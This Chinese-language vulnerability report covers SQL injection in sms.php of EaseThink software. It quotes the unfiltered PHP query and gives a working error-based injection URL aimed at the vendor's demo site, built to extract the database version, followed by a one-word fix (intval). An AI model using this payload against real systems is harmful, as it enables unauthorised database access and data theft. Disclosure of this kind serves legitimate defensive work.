sms.php中对于手机号码未过滤即代入查询,造成SQL注入 if($_REQUEST[act]==subscribe){$tmpl-display(sms_subscribe.html);}elseif($_REQUEST[act]==do_subscribe){//开始发送验证码if(check_ipop_limit(get_client_ip(),sms_send_code,intval(app_conf(SUBMI
if($_REQUEST['act']=='subscribe')
{
$tmpl->display("sms_subscribe.html");
}
elseif($_REQUEST['act']=='do_subscribe')
{
//开始发送验证码
if(check_ipop_limit(get_client_ip(),"sms_send_code",intval(app_conf("SUBMIT_DELAY"))))
{
$mobile = trim($_REQUEST['mobile']);
$verify = md5(trim($_REQUEST['verify']));
$session_verify = $_SESSION['verify'];
if($verify!=$session_verify)
{
$result['type'] = 0;
$result['message'] = $GLOBALS['lang']['VERIFY_CODE_ERROR'];
ajax_return($result);
}
$mobile_subscribe = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."mobile_list where mobile='".$mobile."'");
不注释了,一眼看出来没有任何过滤
利用方式:
1. http://demo.easethink.com/sms.php?act=subscribe获得验证码,将其拼接到下一步中的verify中。
2. http://demo.easethink.com/sms.php?act=do_subscribe&verify=8069&mobile=111'and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23
修复方案:
intval
intval